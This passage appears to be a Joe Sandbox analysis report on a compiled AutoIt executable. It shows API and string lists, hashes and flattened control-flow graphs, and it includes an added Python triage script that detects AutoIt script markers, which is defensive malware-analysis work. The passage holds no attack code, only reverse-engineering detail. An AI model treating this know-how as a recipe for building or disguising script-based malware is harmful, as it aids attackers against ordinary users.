                                                                            • Part of subcall function 00007FF7ADC03CBC: ShowWindow.USER32 ref: 00007FF7ADC03D75
                                                                            • Part of subcall function 00007FF7ADC06258: Shell_NotifyIconW.SHELL32 ref: 00007FF7ADC06350
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Load$IconWindow$CurrentDirectory$CreateFullNamePath$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell_Show
                                                                          • String ID: This is a third-party compiled AutoIt script.$runas
                                                                          • API String ID: 1593035822-3287110873
                                                                          • Opcode ID: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                          • Instruction ID: 8eb2ebf0ca544e44f3e6b2b4721638257c4dd4454212f152dc60643ca69cce01
                                                                          • Opcode Fuzzy Hash: 76182cffaad3958b66f0f298839ba34e861d4864c33095e5d1649e464e4238a0
                                                                          • Instruction Fuzzy Hash: 22713B62A1F6839DEA20BB60E8541F9E761FF45754FC20136D54D462B6FE2CEA0BC320

                                                                          Control-flow Graph

                                                                          Control-flow graph of the function at 7ff7adc06580 omitted (interactive diagram flattened to basic-block ranges, executed/not-executed colouring and edge pairs). Recoverable from the block labels: the function calls CreateStreamOnHGlobal, then FindResourceExW, LoadResource, SizeofResource and LockResource, i.e. it locates a resource in its own image and maps it into memory; the strings listed below (AU3!, EA06, SCRIPT) are the resource name and marker fragments it works with.
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                          • String ID: AU3!$EA06$SCRIPT
                                                                          • API String ID: 3051347437-2925976212
                                                                          • Opcode ID: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                                          • Instruction ID: d0386783e62ed110d15af014520d46937ff2da5166b5c17ac9a792a1100e4f9c
                                                                          • Opcode Fuzzy Hash: 2a37f8564f4c8a4eeb189e72451b06d9c699f805bbd4e08f379393b5199a872e
                                                                          • Instruction Fuzzy Hash: 12910272B0E6418AEB20AF65D448A7DA7A4FB45B84FC20135DE6D477A1EF38E406C720
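The function above is the AutoIt v3 runtime locating its embedded script: it resolves a resource by name with FindResourceExW, maps it with LoadResource, LockResource and SizeofResource, hands it to CreateStreamOnHGlobal, and the referenced strings SCRIPT, AU3! and EA06 are the resource name and the marker that introduces a compiled script body. The Python below is an added triage example, not Joe Sandbox output and not AutoIt's own code: it scans a file statically for the length-prefixed UTF-16LE resource name SCRIPT (the IMAGE_RESOURCE_DIR_STRING_U layout that FindResourceExW resolves against) and for the contiguous AU3!EA06 marker. The 16-byte signature assumed to precede the marker and the constructed sample bytes are assumptions, not data from this report.

```python
"""Triage check for compiled AutoIt v3 executables.

Added example, not Joe Sandbox output and not AutoIt's own code. It
mirrors what the analysed runtime function does at load time (resolve a
resource named SCRIPT, map it, check the leading AU3!/EA06 marker),
except that the file is scanned statically instead of being executed.
"""
from __future__ import annotations

import struct
import sys

# Marker that introduces a compiled AutoIt v3 script body. The report lists
# "AU3!" and "EA06" as two separate strings, consistent with the runtime
# comparing them as two 4-byte values; on disk they are contiguous.
AU3_MARKER = b"AU3!EA06"

# 16-byte signature commonly documented ahead of AU3!EA06 in compiled
# scripts. Assumption for this example; verify against your own sample.
AU3_MAGIC = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D")

# Named resources are stored in the PE resource directory as
# IMAGE_RESOURCE_DIR_STRING_U: a WORD length followed by UTF-16LE text.
# The name the runtime hands to FindResourceExW is "SCRIPT".
SCRIPT_RESOURCE_ENTRY = struct.pack("<H", 6) + "SCRIPT".encode("utf-16-le")


def find_au3_markers(data: bytes) -> list[int]:
    """Return every file offset at which AU3!EA06 occurs."""
    offsets, pos = [], data.find(AU3_MARKER)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(AU3_MARKER, pos + 1)
    return offsets


def has_script_resource(data: bytes) -> bool:
    """True if a length-prefixed UTF-16LE resource name SCRIPT is present.

    Requiring the length prefix avoids matching the same six letters
    inside longer UTF-16 strings such as DESCRIPTION.
    """
    return SCRIPT_RESOURCE_ENTRY in data


def classify(data: bytes) -> dict:
    """Combine the three artefacts into a verdict a triage script can act on."""
    markers = find_au3_markers(data)
    magic_ok = [off for off in markers
                if off >= len(AU3_MAGIC)
                and data[off - len(AU3_MAGIC):off] == AU3_MAGIC]
    script_res = has_script_resource(data)
    if not markers:
        verdict = "not_autoit"
    elif script_res and magic_ok:
        verdict = "compiled_autoit_exe"      # resource name + magic + marker
    else:
        verdict = "autoit_script_present"    # marker only, e.g. script stored elsewhere
    return {
        "verdict": verdict,
        "marker_offsets": markers,
        "magic_confirmed_offsets": magic_ok,
        "script_resource": script_res,
    }


def build_sample(with_autoit: bool) -> bytes:
    """Constructed stand-in for a PE image (not a real binary)."""
    blob = bytearray(b"MZ" + b"\x00" * 62)    # 64-byte header stub
    blob += b"\x90" * 192                      # padding; offset 256 reached
    if with_autoit:
        blob += SCRIPT_RESOURCE_ENTRY          # 14 bytes: resource name entry
        blob += b"\x00" * 16                   # alignment before resource data
        blob += AU3_MAGIC + AU3_MARKER         # magic at 286, marker at 302
        blob += b"<compiled script body placeholder>"
    else:
        # Decoys: the UTF-16 letters SCRIPT inside DESCRIPTION, and the two
        # marker halves present but not contiguous.
        blob += "DESCRIPTION".encode("utf-16-le")
        blob += b"AU3!" + b"\x00" * 4 + b"EA06"
    return bytes(blob)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(classify(fh.read()))
    else:
        for flag in (True, False):
            print(classify(build_sample(flag)))
```

Run it against the dropped executable from this analysis to confirm the "compiled AutoIt script" verdict independently of the sandbox; a marker without the SCRIPT resource entry still means an AutoIt script body is present, just not in the resource the runtime shown above reads.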

control_flow_graph 482 7ff7adc21d80-7ff7adc21e17 call 7ff7adc09640 GetVersionExW call 7ff7adc07cf4 487 7ff7adc21e1d 482->487 488 7ff7adc69450 482->488 490 7ff7adc21e20-7ff7adc21e46 call 7ff7adc0dda4 487->490 489 7ff7adc69457-7ff7adc6945d 488->489 491 7ff7adc69463-7ff7adc69480 489->491 495 7ff7adc21e4c 490->495 496 7ff7adc21fc1 490->496 491->491 493 7ff7adc69482-7ff7adc69485 491->493 493->490 497 7ff7adc6948b-7ff7adc69491 493->497 498 7ff7adc21e53-7ff7adc21e59 495->498 496->488 497->489 499 7ff7adc69493 497->499 500 7ff7adc21e5f-7ff7adc21e7c 498->500 502 7ff7adc69498-7ff7adc694a1 499->502 500->500 501 7ff7adc21e7e-7ff7adc21e81 500->501 501->502 503 7ff7adc21e87-7ff7adc21ed6 call 7ff7adc0dda4 501->503 502->498 504 7ff7adc694a7 502->504 507 7ff7adc21edc-7ff7adc21ede 503->507 508 7ff7adc69645-7ff7adc6964d 503->508 504->496 511 7ff7adc694ac-7ff7adc694af 507->511 512 7ff7adc21ee4-7ff7adc21efa 507->512 509 7ff7adc6965a-7ff7adc6965d 508->509 510 7ff7adc6964f-7ff7adc69658 508->510 513 7ff7adc69686-7ff7adc69692 509->513 514 7ff7adc6965f-7ff7adc69674 509->514 510->513 517 7ff7adc21f3c-7ff7adc21f80 GetCurrentProcess IsWow64Process call 7ff7adc26240 511->517 518 7ff7adc694b5-7ff7adc69501 511->518 515 7ff7adc21f00-7ff7adc21f02 512->515 516 7ff7adc69572-7ff7adc69579 512->516 529 7ff7adc6969d-7ff7adc696b3 call 7ff7adc732f4 513->529 519 7ff7adc69676-7ff7adc6967d 514->519 520 7ff7adc6967f 514->520 523 7ff7adc21f08-7ff7adc21f0b 515->523 524 7ff7adc6959e-7ff7adc695b3 515->524 521 7ff7adc6957b-7ff7adc69584 516->521 522 7ff7adc69589-7ff7adc69599 516->522 517->529 536 7ff7adc21f86-7ff7adc21f8b GetSystemInfo 517->536 518->517 526 7ff7adc69507-7ff7adc6950e 518->526 519->513 520->513 521->517 522->517 530 7ff7adc695ed-7ff7adc695f0 523->530 531 7ff7adc21f11-7ff7adc21f2d 523->531 532 7ff7adc695b5-7ff7adc695be 524->532 533 7ff7adc695c3-7ff7adc695d3 524->533 527 7ff7adc69534-7ff7adc6953c 526->527 528 7ff7adc69510-7ff7adc69518 526->528 539 7ff7adc6953e-7ff7adc69547 527->539 540 7ff7adc6954c-7ff7adc69554 527->540 537 7ff7adc6951a-7ff7adc69521 528->537 538 7ff7adc69526-7ff7adc6952f 528->538 550 7ff7adc696d7-7ff7adc696dc GetSystemInfo 529->550 551 7ff7adc696b5-7ff7adc696d5 call 7ff7adc732f4 529->551 530->517 535 7ff7adc695f6-7ff7adc69620 530->535 542 7ff7adc695d8-7ff7adc695e8 531->542 543 7ff7adc21f33 531->543 532->517 533->517 544 7ff7adc69622-7ff7adc6962b 535->544 545 7ff7adc69630-7ff7adc69640 535->545 546 7ff7adc21f91-7ff7adc21fc0 536->546 537->517 538->517 539->517 547 7ff7adc69556-7ff7adc6955f 540->547 548 7ff7adc69564-7ff7adc6956d 540->548 542->517 543->517 544->517 545->517 547->517 548->517 552 7ff7adc696e2-7ff7adc696ea 550->552 551->552 552->546 555 7ff7adc696f0-7ff7adc696f7 FreeLibrary 552->555 555->546
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentInfoSystemVersionWow64
                                                                          • String ID: |O
                                                                          • API String ID: 1568231622-607156228
                                                                          • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                          • Instruction ID: 21573b72a25c678a5f933ccead237185149536cd4033c3ae9f6ab2d1d1e12938
                                                                          • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                          • Instruction Fuzzy Hash: 4AD16F12A1F3C29DE661AB54E8202F5EB60EF19B84FC60035D54D03675FE6CA947D731

control_flow_graph 719 7ff7adc9f630-7ff7adc9f69e call 7ff7adc26240 722 7ff7adc9f6a0-7ff7adc9f6b8 call 7ff7adc0ffbc 719->722 723 7ff7adc9f6d4-7ff7adc9f6d9 719->723 731 7ff7adc9f708-7ff7adc9f70d 722->731 732 7ff7adc9f6ba-7ff7adc9f6d2 call 7ff7adc0ffbc 722->732 724 7ff7adc9f6db-7ff7adc9f6ef call 7ff7adc0ffbc 723->724 725 7ff7adc9f71e-7ff7adc9f723 723->725 739 7ff7adc9f6f3-7ff7adc9f706 call 7ff7adc0ffbc 724->739 728 7ff7adc9f736-7ff7adc9f75c call 7ff7adc0d4cc call 7ff7adc0e330 725->728 729 7ff7adc9f725-7ff7adc9f729 725->729 748 7ff7adc9f840-7ff7adc9f84a 728->748 749 7ff7adc9f762-7ff7adc9f7cf call 7ff7adc0d4cc call 7ff7adc0e330 call 7ff7adc0d4cc call 7ff7adc0e330 call 7ff7adc0d4cc call 7ff7adc0e330 728->749 735 7ff7adc9f72d-7ff7adc9f732 call 7ff7adc0ffbc 729->735 740 7ff7adc9f70f-7ff7adc9f717 731->740 741 7ff7adc9f719-7ff7adc9f71c 731->741 732->739 735->728 739->725 739->731 740->735 741->725 741->728 750 7ff7adc9f84c-7ff7adc9f86e call 7ff7adc0d4cc call 7ff7adc0e330 748->750 751 7ff7adc9f87d-7ff7adc9f8af GetCurrentDirectoryW call 7ff7adc24c68 GetCurrentDirectoryW 748->751 798 7ff7adc9f7d1-7ff7adc9f7f3 call 7ff7adc0d4cc call 7ff7adc0e330 749->798 799 7ff7adc9f806-7ff7adc9f83e GetSystemDirectoryW call 7ff7adc24c68 GetSystemDirectoryW 749->799 750->751 767 7ff7adc9f870-7ff7adc9f87b call 7ff7adc28d58 750->767 760 7ff7adc9f8b5-7ff7adc9f8b8 751->760 763 7ff7adc9f8f0-7ff7adc9f8ff call 7ff7adc7f464 760->763 764 7ff7adc9f8ba-7ff7adc9f8eb call 7ff7adc1f688 * 3 760->764 774 7ff7adc9f901-7ff7adc9f903 763->774 775 7ff7adc9f905-7ff7adc9f95d call 7ff7adc7fddc call 7ff7adc7fca8 call 7ff7adc7fafc 763->775 764->763 767->751 767->763 781 7ff7adc9f964-7ff7adc9f96c 774->781 775->781 809 7ff7adc9f95f 775->809 786 7ff7adc9fa0f-7ff7adc9fa4b CreateProcessW 781->786 787 7ff7adc9f972-7ff7adc9fa0d call 7ff7adc6d1f8 call 7ff7adc28d58 * 3 call 7ff7adc24c24 * 3 781->787 791 7ff7adc9fa4f-7ff7adc9fa62 call 7ff7adc24c24 * 2 786->791 787->791 811 7ff7adc9fa64-7ff7adc9fabc call 7ff7adc04afc * 2 GetLastError call 7ff7adc1f214 call 7ff7adc113e0 791->811 812 7ff7adc9fabe-7ff7adc9faca CloseHandle 791->812 798->799 824 7ff7adc9f7f5-7ff7adc9f800 call 7ff7adc28d58 798->824 799->760 809->781 827 7ff7adc9fb3b-7ff7adc9fb65 call 7ff7adc7f51c 811->827 818 7ff7adc9faf5-7ff7adc9fafc 812->818 819 7ff7adc9facc-7ff7adc9faf0 call 7ff7adc7f7dc call 7ff7adc80088 call 7ff7adc9fb68 812->819 820 7ff7adc9fb0c-7ff7adc9fb35 call 7ff7adc113e0 CloseHandle 818->820 821 7ff7adc9fafe-7ff7adc9fb0a 818->821 819->818 820->827 821->827 824->760 824->799
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 1787492119-0
                                                                          • Opcode ID: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                                          • Instruction ID: 641148fd2f43cd6df012bb00eb6b3dacb72110da0d97d777e2b9f68ee3580995
                                                                          • Opcode Fuzzy Hash: b5529a047433c39029aa94f7abef1aaae7ba2a451b0d80efb392d77c1937dd44
                                                                          • Instruction Fuzzy Hash: 34E19122B0DB418AEB14EF26D8502BDA7A1FB84B84FC14535EE5D477A9EF38E446C710
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                          • String ID:
                                                                          • API String ID: 2695905019-0
                                                                          • Opcode ID: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                          • Instruction ID: 66ab5d439af5312331d36911590a8ef8acad36c8086180822ce87bcfaebd709e
                                                                          • Opcode Fuzzy Hash: 0e40a590ccee8b84c2b17bba0c0d64c91c67e628f63cf05be15c9ff0c6569a5d
                                                                          • Instruction Fuzzy Hash: 9EF05E10E1E60786EB246B24B808378A260EF41BB5FD54730D47E062F4EF6CD49A4A10

                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                          • API String ID: 2667193904-1575078665
                                                                          • Opcode ID: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                                          • Instruction ID: 37fb839e569b5833edc7f29974be67ca9f8fee827be23b7ca02b184e35344132
                                                                          • Opcode Fuzzy Hash: e4a1d1e4efa0bc87a7461a6a39f11fb0c9c767336ce2d992286509dae00062b4
                                                                          • Instruction Fuzzy Hash: D9913C22A1EB4299EB10BB24E8501F9E364FF84754FC21132E94D46AB5FF7CD646C760

                                                                          control_flow_graph 131 7ff7adc05dec-7ff7adc05e21 133 7ff7adc05e23-7ff7adc05e26 131->133 134 7ff7adc05e91-7ff7adc05e94 131->134 136 7ff7adc05e98 133->136 137 7ff7adc05e28-7ff7adc05e2f 133->137 134->133 135 7ff7adc05e96 134->135 138 7ff7adc05e6b-7ff7adc05e76 DefWindowProcW 135->138 139 7ff7adc4c229-7ff7adc4c261 call 7ff7adc1ede4 call 7ff7adc22c44 136->139 140 7ff7adc05e9e-7ff7adc05ea3 136->140 141 7ff7adc05e35-7ff7adc05e3a 137->141 142 7ff7adc05f21-7ff7adc05f29 PostQuitMessage 137->142 149 7ff7adc05e7c-7ff7adc05e90 138->149 178 7ff7adc4c267-7ff7adc4c26e 139->178 144 7ff7adc05ea5-7ff7adc05ea8 140->144 145 7ff7adc05ecc-7ff7adc05efa SetTimer RegisterWindowMessageW 140->145 146 7ff7adc05e40-7ff7adc05e43 141->146 147 7ff7adc4c2af-7ff7adc4c2c5 call 7ff7adc7a40c 141->147 143 7ff7adc05ec8-7ff7adc05eca 142->143 143->149 150 7ff7adc4c1b8-7ff7adc4c1bb 144->150 151 7ff7adc05eae-7ff7adc05ebe KillTimer call 7ff7adc05d88 144->151 145->143 152 7ff7adc05efc-7ff7adc05f09 CreatePopupMenu 145->152 153 7ff7adc05f2b-7ff7adc05f35 call 7ff7adc24610 146->153 154 7ff7adc05e49-7ff7adc05e4e 146->154 147->143 172 7ff7adc4c2cb 147->172 158 7ff7adc4c1bd-7ff7adc4c1c0 150->158 159 7ff7adc4c1f7-7ff7adc4c224 MoveWindow 150->159 168 7ff7adc05ec3 call 7ff7adc07098 151->168 152->143 165 7ff7adc05f3a 153->165 161 7ff7adc05e54-7ff7adc05e59 154->161 162 7ff7adc4c292-7ff7adc4c299 154->162 166 7ff7adc4c1e4-7ff7adc4c1f2 SetFocus 158->166 167 7ff7adc4c1c2-7ff7adc4c1c5 158->167 159->143 170 7ff7adc05e5f-7ff7adc05e65 161->170 171 7ff7adc05f0b-7ff7adc05f1f call 7ff7adc05f3c 161->171 162->138 169 7ff7adc4c29f-7ff7adc4c2aa call 7ff7adc6c54c 162->169 165->143 166->143 167->170 174 7ff7adc4c1cb-7ff7adc4c1df call 7ff7adc1ede4 167->174 168->143 169->138 170->138 170->178 171->143 172->138 174->143 178->138 179 7ff7adc4c274-7ff7adc4c28d call 7ff7adc05d88 call 7ff7adc06258 178->179 179->138
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                          • String ID: TaskbarCreated
                                                                          • API String ID: 129472671-2362178303
                                                                          • Opcode ID: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                          • Instruction ID: 138c6e3fe723e68804440bbbd9c33aa5fe239fefeb1a688a5b10ddd7bee6064c
                                                                          • Opcode Fuzzy Hash: 72f25fe2909dc216fe8e5bf23ccffbdf7394ac074e80fb2f1d04dd01aa152451
                                                                          • Instruction Fuzzy Hash: 03518E3292E7538EF620FB14E9142B9E665EF49B80FC60031D59D826B1FE6CF9079320

                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
• Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                          • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                          • API String ID: 2914291525-2659433951
                                                                          • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                          • Instruction ID: 98f426c50778554974e755a4d02dedae1649d78d6f749fd417f72bbc82eb10ae
                                                                          • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                          • Instruction Fuzzy Hash: 6C313432A19B419EE700EF60E8443A877B4FB48B48FD10138CA9D16B64EF7CE55ACB50

control_flow_graph 189 7ff7adc1e958-7ff7adc1e9ae 190 7ff7adc627e4-7ff7adc627ea DestroyWindow 189->190 191 7ff7adc1e9b4-7ff7adc1e9d3 mciSendStringW 189->191 194 7ff7adc627f0-7ff7adc62801 190->194 192 7ff7adc1e9d9-7ff7adc1e9e3 191->192 193 7ff7adc1ecbd-7ff7adc1ecce 191->193 192->194 197 7ff7adc1e9e9 192->197 195 7ff7adc1ecf7-7ff7adc1ed01 193->195 196 7ff7adc1ecd0-7ff7adc1ecf0 UnregisterHotKey 193->196 199 7ff7adc62803-7ff7adc62806 194->199 200 7ff7adc62835-7ff7adc6283f 194->200 195->192 202 7ff7adc1ed07 195->202 196->195 201 7ff7adc1ecf2 call 7ff7adc1f270 196->201 198 7ff7adc1e9f0-7ff7adc1e9f3 197->198 203 7ff7adc1e9f9-7ff7adc1ea08 call 7ff7adc03aa8 198->203 204 7ff7adc1ecb0-7ff7adc1ecb8 call 7ff7adc05410 198->204 205 7ff7adc62808-7ff7adc62811 call 7ff7adc08314 199->205 206 7ff7adc62813-7ff7adc62817 FindClose 199->206 200->194 208 7ff7adc62841 200->208 201->195 202->193 218 7ff7adc1ea0f-7ff7adc1ea12 203->218 204->198 211 7ff7adc6281d-7ff7adc6282e 205->211 206->211 217 7ff7adc62846-7ff7adc6284f call 7ff7adc98c00 208->217 211->200 216 7ff7adc62830 call 7ff7adc83180 211->216 216->200 217->218 218->217 221 7ff7adc1ea18 218->221 223 7ff7adc1ea1f-7ff7adc1ea22 221->223 224 7ff7adc1ea28-7ff7adc1ea32 223->224 225 7ff7adc62854-7ff7adc6285d call 7ff7adc746cc 223->225 227 7ff7adc1ea38-7ff7adc1ea42 224->227 228 7ff7adc62862-7ff7adc62873 224->228 225->223 232 7ff7adc6288c-7ff7adc6289d 227->232 233 7ff7adc1ea48-7ff7adc1ea76 call 7ff7adc113e0 227->233 230 7ff7adc6287b-7ff7adc62885 228->230 231 7ff7adc62875 FreeLibrary 228->231 230->228 234 7ff7adc62887 230->234 231->230 235 7ff7adc628c9-7ff7adc628d3 232->235 236 7ff7adc6289f-7ff7adc628c2 VirtualFree 232->236 242 7ff7adc1ea78 233->242 243 7ff7adc1eabf-7ff7adc1eacc OleUninitialize 233->243 234->232 235->232 240 7ff7adc628d5 235->240 236->235 238 7ff7adc628c4 call 7ff7adc8321c 236->238 238->235 244 7ff7adc628da-7ff7adc628de 240->244 246 7ff7adc1ea7d-7ff7adc1eabd call 7ff7adc1f1c4 call 7ff7adc1f13c 242->246 243->244 245 7ff7adc1ead2-7ff7adc1ead9 243->245 244->245 247 7ff7adc628e4-7ff7adc628ef 244->247 248 7ff7adc628f4-7ff7adc62903 call 7ff7adc831d4 245->248 249 7ff7adc1eadf-7ff7adc1eaea 245->249 246->243 261 7ff7adc62905 248->261 252 7ff7adc1ed09-7ff7adc1ed18 call 7ff7adc242a0 249->252 253 7ff7adc1eaf0-7ff7adc1eb22 call 7ff7adc0a07c call 7ff7adc1f08c call 7ff7adc039bc 249->253 252->253 265 7ff7adc1ed1e 252->265 273 7ff7adc1eb2e-7ff7adc1ebc4 call 7ff7adc039bc call 7ff7adc0a07c call 7ff7adc045c8 * 2 call 7ff7adc0a07c * 3 call 7ff7adc113e0 call 7ff7adc1ee68 call 7ff7adc1ee2c * 3 253->273 274 7ff7adc1eb24-7ff7adc1eb29 call 7ff7adc24c24 253->274 266 7ff7adc6290a-7ff7adc62919 call 7ff7adc73a78 261->266 265->252 272 7ff7adc6291b 266->272 278 7ff7adc62920-7ff7adc6292f call 7ff7adc1e4e4 272->278 273->266 316 7ff7adc1ebca-7ff7adc1ebdc call 7ff7adc039bc 273->316 274->273 283 7ff7adc62931 278->283 286 7ff7adc62936-7ff7adc62945 call 7ff7adc83078 283->286 292 